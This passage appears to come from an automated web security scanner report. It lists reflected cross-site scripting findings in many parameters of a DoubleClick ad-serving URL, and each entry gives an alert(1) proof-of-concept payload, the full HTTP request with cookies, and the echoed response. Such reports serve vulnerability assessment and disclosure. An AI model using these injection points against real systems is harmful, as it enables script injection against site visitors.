B239757684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=b4502"-alert(1)-"bcfcfdf8581&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.
...[SNIP]...

3.382. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8473c'-alert(1)-'4cff64c594a was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=8473c'-alert(1)-'4cff64c594a&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4689

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
B239757684%3B1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=8473c'-alert(1)-'4cff64c594a&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.
...[SNIP]...

3.383. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c6f6'-alert(1)-'3317ede0935 was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=1008c6f6'-alert(1)-'3317ede0935&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4695

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
0-0%3B0%3B61212126%3B3454-728/90%3B41608334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=1008c6f6'-alert(1)-'3317ede0935&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-st
...[SNIP]...

3.384. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59ff3"-alert(1)-"a09a67b2d18 was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=10059ff3"-alert(1)-"a09a67b2d18&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4689

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
1-0%3B0%3B61212126%3B3454-728/90%3B41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=10059ff3"-alert(1)-"a09a67b2d18&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-st
...[SNIP]...

3.385. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [ppartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff586'-alert(1)-'c05e9585e21 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=ff586'-alert(1)-'c05e9585e21&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4689

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=ff586'-alert(1)-'c05e9585e21&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/d
...[SNIP]...

3.386. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [ppartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5519"-alert(1)-"fd76ab44770 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=d5519"-alert(1)-"fd76ab44770&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4695

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=d5519"-alert(1)-"fd76ab44770&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/d
...[SNIP]...

3.387. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6771d'-alert(1)-'1a16a6a8536 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=24046771d'-alert(1)-'1a16a6a8536&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4695

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
17/14a/%2a/n%3B239757684%3B0-0%3B0%3B61212126%3B3454-728/90%3B41608334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=24046771d'-alert(1)-'1a16a6a8536&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/
...[SNIP]...

3.388. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30d94"-alert(1)-"9c506468d33 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=240430d94"-alert(1)-"9c506468d33&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:38:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4695

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
17/14a/%2a/n%3B239757684%3B0-0%3B0%3B61212126%3B3454-728/90%3B41608334/41626121/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=240430d94"-alert(1)-"9c506468d33&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/
...[SNIP]...

3.389. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [ra parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9e50'-alert(1)-'004cb74b4bc was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243b9e50'-alert(1)-'004cb74b4bc&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:40:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4695

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
03940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243b9e50'-alert(1)-'004cb74b4bc&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N5823.CNET_61212126_239757684_41608334\"
...[SNIP]...

3.390. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [ra parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15cbc"-alert(1)-"608d4e19f74 was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.24315cbc"-alert(1)-"608d4e19f74&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:40:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4695

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
03940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.24315cbc"-alert(1)-"608d4e19f74&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpid=ex_r11400_us/en/smb/ipg/ojp_olas/dm:_N5823.CNET_61212126_239757684_41608334")
...[SNIP]...

3.391. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [rqid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8d50"-alert(1)-"f3f94351ac2 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34f8d50"-alert(1)-"f3f94351ac2&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4689

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF34f8d50"-alert(1)-"f3f94351ac2&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpi
...[SNIP]...

3.392. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [rqid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f433'-alert(1)-'597cd362001 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5823.CNET/B4978620.21;sz=728x90;click0=http://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF349f433'-alert(1)-'597cd362001&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/;ord=2011.04.27.23.35.39? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 27 Apr 2011 23:39:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4689

document.write('\n\n');

function DCFlash(id,pVM){
...[SNIP]...
41608435/41626222/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=18626&sg=503940&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e6:4DB8889723EF349f433'-alert(1)-'597cd362001&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.39&event=58/http://www.hp.com/united-states/campaigns/officejet-pro/?jumpi
...[SNIP]...

3.393. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [sg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5823.CNET/B4978620.21

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba5fc'-alert(1)-'19c8d83429c was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

